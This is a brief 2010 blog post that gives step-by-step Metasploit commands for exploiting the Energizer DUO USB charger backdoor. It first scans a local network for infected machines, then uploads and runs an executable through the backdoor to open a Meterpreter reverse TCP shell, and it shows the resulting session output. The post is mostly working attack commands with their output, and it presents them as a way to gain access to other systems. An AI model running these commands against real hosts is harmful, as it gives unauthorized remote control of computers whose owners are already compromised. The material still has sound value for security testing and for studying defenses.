Wednesday, 10 March 2010

How To Exploit the Energizer Trojan

As of release version 8749, you can now use Metasploit to locate infected systems on your local network using the following commands.

# msfconsole
msf > use auxiliary/scanner/backdoor/energizer_duo_detect
msf auxiliary(energizer_duo_detect) > set RHOSTS
msf auxiliary(energizer_duo_detect) > set THREADS 256
msf auxiliary(energizer_duo_detect) > run

[*] FOUND: [["F", "AUTOEXEC.BAT"] .......

To take things a step further and gain access to a system running this backdoor, use the energizer_duo_payload module:

msf > use exploit/windows/backdoor/energizer_duo_payload
msf exploit(energizer_duo_payload) > set RHOST
msf exploit(energizer_duo_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(energizer_duo_payload) > set LHOST
msf exploit(energizer_duo_payload) > exploit

[*] Started reverse handler on

[*] Trying to upload C:\NTL0ZTL4DhVL.exe...

[*] Trying to execute C:\NTL0ZTL4DhVL.exe...

[*] Sending stage (747008 bytes)

[*] Meterpreter session 1 opened ( ->

meterpreter > getuid
Server username: HACKME\TestUser